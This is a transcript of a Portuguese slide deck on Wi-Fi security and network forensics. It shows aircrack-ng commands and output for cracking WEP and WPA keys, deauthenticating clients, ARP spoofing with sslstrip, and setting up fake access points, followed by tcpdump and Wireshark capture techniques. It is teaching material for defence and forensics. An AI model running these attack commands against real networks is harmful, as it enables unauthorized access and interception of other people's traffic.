Segurança e Forense em Redes de Computadores
-
Upload
euler-neto -
Category
Internet
-
view
376 -
download
2
description
Transcript of Segurança e Forense em Redes de Computadores
![Page 1: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/1.jpg)
Segurança e Forense em Redes de Computadores
![Page 2: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/2.jpg)
whoami
Euler Neto
Entusiasta NTI GDG AracajuSegurança (UFS São Cristóvão)
![Page 3: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/3.jpg)
Segurança em Redesde Computadores sem fio
![Page 4: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/4.jpg)
WLAN Frames
![Page 5: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/5.jpg)
WLAN Frames
● Tipos○ Management: manutenção da comunicação entre o access point
e o cliente
○ Control: troca de dados entre o access point e o cliente
○ Data
![Page 6: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/6.jpg)
WLAN Frames
● Management○ Authentication○ De-authentication○ Association (Request e Response)○ Reassociation (Request e Response)○ Disassociation○ Beacon○ Probe (Request e Response)
![Page 7: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/7.jpg)
WLAN Frames
● Control Frames○ Request to Send (RTS)○ Clear to Send (CTS)○ Acknowledgement (ACK)
![Page 8: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/8.jpg)
Aircrack-ng
● Conjunto de ferramentas para captura e análise em redes sem fio
● Principais ferramentas:○ airmon-ng: ativar modo monitor da interface○ airodump-ng: captura de dados na rede sem fio○ aircrack-ng: quebra de chaves○ aireplay-ng: injetar pacotes na rede sem fio
![Page 9: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/9.jpg)
Interface de rede (NIC)
● Modo Normal: captura tráfego da rede que está associado
● Modo Monitor: captura qualquer dado que circula no ar
![Page 10: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/10.jpg)
Interface de rede (NIC)
● Ativando modo Monitor com o aircrack-ng
#: airmon-ng
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy0]
#: airmon-ng start wlan0
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy0](monitor mode enabled on mon0)
![Page 11: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/11.jpg)
Interface de rede (NIC)
● Ativando modo Monitor com o aircrack-ng
#: airmon-ng
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy0]mon0 Ralink 2573 USB rt73usb - [phy0]
![Page 12: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/12.jpg)
Criptografia WLAN
● WEP
● WPA / WPA2
![Page 13: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/13.jpg)
Criptografia WLAN
● WEP○ Foi descoberto como quebrar em 2000○ Fragilidade pelo IV (vetor de inicialização)○ Depende de tráfego na rede○ Quanto mais pacotes capturados, melhor
#: airodump-ng --bssid <endereço MAC do AP> --channel <canal> --write <arquivo> mon0
![Page 14: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/14.jpg)
Criptografia WLAN
● WEP○ Processo do airodump-ng
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP MyNetwork BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782
![Page 15: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/15.jpg)
Criptografia WLAN
● WEP○ E se não houver tráfego?○ É possível injetar pacotes para “simular” tráfego
#: aireplay-ng -3 -b <endereço MAC do AP> -h <endereço MAC do cliente> mon0
![Page 16: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/16.jpg)
Criptografia WLAN
● WEP○ Processo do aireplay-ng (ARP Request)
Saving ARP requests in replay_arp-0321-191525.cap You should also start airodump-ng to capture replies. Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
![Page 17: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/17.jpg)
Criptografia WLAN
● WEP○ Utilizar aircrack-ng com o arquivo gerado pelo
airodump-ng○ Se funcionar, a senha da rede será revelada○ Se não funcionar, repetir todo o processo
capturando mais pacotes
#: aireplay-ng -3 -b [endereço MAC do modem] -h [endereço MAC do cliente] mon0#: aircrack-ng <arquivo>
![Page 18: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/18.jpg)
Criptografia WLAN
● WEP○ Processo do aircrack-ng
Aircrack-ng 0.9 [00:03:06] Tested 674449 keys (got 96610 IVs) KB depth byte(vote) 0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0) 1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12) 2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10) 3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15) KEY FOUND! [ 12:34:56:78:90 ] Probability: 100%
![Page 19: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/19.jpg)
Criptografia WLAN
● WPA / WPA2○ WPA utiliza um algoritmo de segurança mais
robusto (TKIP)○ WPA2 utiliza um ainda mais robusto (AES-CCMP)○ Mas ambos são vulneráveis a ataque de dicionário
(WPA-Personal)
![Page 20: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/20.jpg)
Criptografia WLAN
● WPA / WPA2○ Por que são vulneráveis?
![Page 21: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/21.jpg)
Criptografia WLAN
● WPA / WPA2○ Também utilizando o airodump-ng○ Após executar o airodump-ng, esperar por um
handshake
![Page 22: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/22.jpg)
Criptografia WLAN
● WPA / WPA2○ E se não tiver handshake?○ Se já tiver algum usuário na rede, o força a
reconectar
○ Se não tiver, infelizmente nada pode ser feito
#: aircrack-ng [arquivo]#: aireplay-ng --deauth 1 -a <endereço MAC do usuário conectado> mon0
![Page 23: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/23.jpg)
Criptografia WLAN
● WPA / WPA2○ Necessita de um bom dicionário
#: aircrack-ng <arquivo> -w <dicionario>
![Page 24: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/24.jpg)
Man-in-the-Middle
● Se colocar entre um cliente e o access point● Interceptar o tráfego● Algumas maneiras de fazer:
○ arp spoofing○ Fake AP
![Page 25: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/25.jpg)
Man-in-the-Middle
● Arp spoofing○ Funcionamento do protocolo ARP○ Vulnerabilidade do ARP○ Explorando a vulnerabilidade
![Page 26: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/26.jpg)
Man-in-the-Middle
● Protocolo ARP○ ARP Request
Quem é 192.168.1.5?Quem é 192.168.1.5?
Quem é 192.168.1.5? 192.168.1.5
192.168.1.3
192.168.1.6
![Page 27: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/27.jpg)
Man-in-the-Middle
● Protocolo ARP○ ARP Reply
Quem é 192.168.1.5?EU! End. MAC: AA:AA:AA:AA
Quem é 192.168.1.5?
192.168.1.3
192.168.1.6
192.168.1.5
![Page 28: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/28.jpg)
Man-in-the-Middle
● ARP Spoof○ ARP Request
Quem é 192.168.1.5?Quem é 192.168.1.5?
Quem é 192.168.1.5? 192.168.1.5
192.168.1.3
192.168.1.6
Quem é 192.168.1.5?
![Page 29: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/29.jpg)
Man-in-the-Middle
● ARP Spoof○ ARP Reply (O atacante envia o sinal primeiro)
Quem é 192.168.1.5?
Quem é 192.168.1.5? 192.168.1.5
192.168.1.3
192.168.1.6
EU! End. MAC: AA:AA:AA:AA
EU! End. MAC: BB:BB:BB:BB
![Page 30: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/30.jpg)
Man-in-the-Middle
● Por que funciona?○ Arp spoofing○ “Engana” o cliente e o access point○ Ativar encaminhamento de pacotes
#: echo 1 > /proc/sys/net/ipv4/ip_forward
![Page 31: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/31.jpg)
Man-in-the-Middle
● MITM Passivo○ HTTP○ Não há alteração de dados
A A
BB
![Page 32: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/32.jpg)
Man-in-the-Middle
● MITM Passivo○ Arpspoof
#: arpspoof -i wlan0 -t <IP da vítima> <IP do gateway>
#: arpspoof -i wlan0 -t <IP do gateway> <IP da vítima>
![Page 33: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/33.jpg)
Man-in-the-Middle
● MITM Ativo○ HTTPS○ Alteração de dados
A C
BD
![Page 34: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/34.jpg)
Man-in-the-Middle
● MITM Ativo○ Arpspoof + SSL Strip
#: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <porta não reservada>
#: ssltrip -w <arquivo> -l <porta não reservada>
![Page 35: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/35.jpg)
Man-in-the-Middle
● MITM Ativo○ Resultado: certificado falso
![Page 36: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/36.jpg)
Man-in-the-Middle
● MITM Ativo○ Por que funciona?
■ Falta de informação do cliente
![Page 37: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/37.jpg)
Man-in-the-Middle
● Fake AP○ Criar um AP falso pra enganar a vítima○ Honeypot○ Cuidado com as redes preferenciais
![Page 38: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/38.jpg)
Man-in-the-Middle
● Fake AP (Honeypot)○ Atrair a vítima para o AP falso
○ Criar uma rede falsa com: 1. Mesmo ESSID que a vítima está
associada2. ESSID com um nome falso (ex:
aeroporto, café, …)
![Page 39: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/39.jpg)
Man-in-the-Middle
● Fake AP (Honeypot)○ Rastrear clientes com airodump-ng○ Criar o AP falso com airbase-ng
#: airbase-ng --essid <nome do AP> -c <canal> mon0
![Page 40: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/40.jpg)
Man-in-the-Middle
● Fake AP (Honeypot)○ “Chamar” o cliente○ Ou aumenta o seu sinal…○ ...ou diminui o dele (?)
![Page 41: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/41.jpg)
Man-in-the-Middle
● Fake AP○ aircrack-ng
![Page 42: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/42.jpg)
Análise Forense em Redesde Computadores sem fio
![Page 43: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/43.jpg)
Conceitos
● Perícia forense: ”suporte técnico ao judiciário, realizado por pessoas capacitadas, para responder a quesitos aos quais o judiciário não dispõe de embasamento suficiente para julgar com precisão”
![Page 44: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/44.jpg)
Conceitos
● Computação forense: ”área da computação responsável por dar resposta ao judiciário em questões envolvendo sistemas computacionais”
![Page 45: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/45.jpg)
Conceitos
● Forense em redes: ”captura, armazenamento, manipulação e análise de dados que trafegam (ou trafegaram) em redes de computadores como parte de um processo investigativo”
![Page 46: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/46.jpg)
Grampo digital
● Investigação através de um grampo digital
● Fases:○ Instalação do grampo○ Captura de dados○ Análise de dados
![Page 47: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/47.jpg)
Instalação do grampo
● Procedimento físico: identificar ponto de captura, técnica utilizada
● Técnicas○ Monitorar portas○ Interceptar dados
![Page 48: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/48.jpg)
● Através de portas de monitoramento
Instalação do grampo
A B C D
mensagem de A para B
B recebe
Sniffer instalado
D recebe todo
tráfego de/para A
![Page 49: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/49.jpg)
● Através de interceptação intermediária
Instalação do grampo
A B C
mensagem de A para B
B recebe
Sniffer instalado
D recebe todo tráfego de/para A
D
![Page 50: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/50.jpg)
Instalação do grampo
● Grampo: host associado à rede
● Se não estiver associado○ Captura em modo monitor○ Quebra a chave
![Page 51: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/51.jpg)
Captura de dados
● Procedimento lógico: escolha de software, parâmetros de captura, filtros
● Filtrar dados○ Wireshark?○ tcpdump
![Page 52: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/52.jpg)
Captura de dados
● Filtros no tcpdump○ Por host
○ De um host para outro
#: tcpdump -X -vvv -n -i wlan0 -s0 host <IP> [ and host <IP>]
#: tcpdump -X -vvv -n -i wlan0 -s0 src host <IP> and dst host <IP>
![Page 53: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/53.jpg)
Captura de dados
● Filtros no tcpdump○ Por porta
○ Gravando em arquivo
#: tcpdump -X -vvv -n -i wlan0 -s0 port <porta> [ and port <porta>]
#: tcpdump -X -vvv -n -i wlan0 -w <arquivo>
![Page 54: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/54.jpg)
Análise de dados
● Identificar conteúdo capturado● Responder ao judiciário● Técnicas
○ Casamento de padrões○ Campos do protocolo○ Filtragem
![Page 55: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/55.jpg)
Análise de dados
● Wireshark○ Boa interface○ Vários recursos○ Exportação de pacotes (Follow TCP Stream)
● Chaosreader○ Reconstrói sessão no formato HTML
![Page 56: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/56.jpg)
Análise de dados
● Wireshark
![Page 57: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/57.jpg)
Análise de dados
● Wireshark○ Follow TCP Stream:
■ Baseado em protocolos TCP■ Mostra sequência do tráfego■ Exportação de dados
![Page 58: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/58.jpg)
Análise de dados
● Chaosreader○ Alguns screenshots: http://www.brendangregg.
com/chaosreader.html
![Page 59: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/59.jpg)
Conclusões
● Vulnerabilidades existem● Conhecer como se ataca para se defender● Área forense
![Page 60: Segurança e Forense em Redes de Computadores](https://reader033.fdocument.pub/reader033/viewer/2022052623/559b3bfc1a28ab34078b458b/html5/thumbnails/60.jpg)
Referências● Ramashadran, Vivek. BackTrack 5 Wireless Penetration
Test: Beginner’s Guide. Packt Publishing, 2011.
● Kléber, Ricardo. Introdução à Análise Forense em Redes de Computadores: conceitos, técnicase ferramentas para “grampos digitais”. Novatec, 2013.